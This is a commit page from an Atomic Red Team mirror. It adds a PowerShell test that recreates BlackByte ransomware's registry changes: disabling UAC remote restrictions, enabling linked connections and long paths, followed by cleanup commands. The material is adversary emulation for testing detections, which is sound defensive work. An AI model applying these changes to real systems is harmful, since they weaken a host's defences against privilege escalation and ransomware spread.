security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Blackbyte privilege escalation via Powershell (#1796)

Browse Source 
Co-authored-by: Wilson <SWilson@nti.local>
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
This commit is contained in:
SecWilson
2022-03-07 11:33:31 -06:00
committed by GitHub
parent 7dd9d481b5
commit 43fa5fb8a0
1 changed files with 23 additions and 1 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1112/T1112.yaml
+23 -1
View File
@@ -132,4 +132,26 @@ atomic_tests:
reg delete HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\ /v LongPathsEnabled /f 2>&1
name: command_prompt
elevation_required: true
- name: BlackByte Ransomware Registry Changes - Powershell
description: |
This task recreates the steps taken by BlackByte ransomware before it worms to other machines via Powershell. See "Preparing to Worm" section: https://redcanary.com/blog/blackbyte-ransomware/
The steps are as follows:
<ol>
<li>1. Elevate Local Privilege by disabling UAC Remote Restrictions</li>
<li>2. Enable OS to share network connections between different privilege levels</li>
<li>3. Enable long path values for file paths, names, and namespaces to ensure encryption of all file names and paths</li>
</ol>
The registry keys and their respective values will be created upon successful execution.
supported_platforms:
- windows
executor:
command: |
New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -PropertyType DWord -Value 1 -Force
New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -PropertyType DWord -Value 1 -Force
New-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -PropertyType DWord -Value 1 -Force
cleanup_command: |
Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -Force
Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -Force
Remove-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -Force
name: powershell
elevation_required: true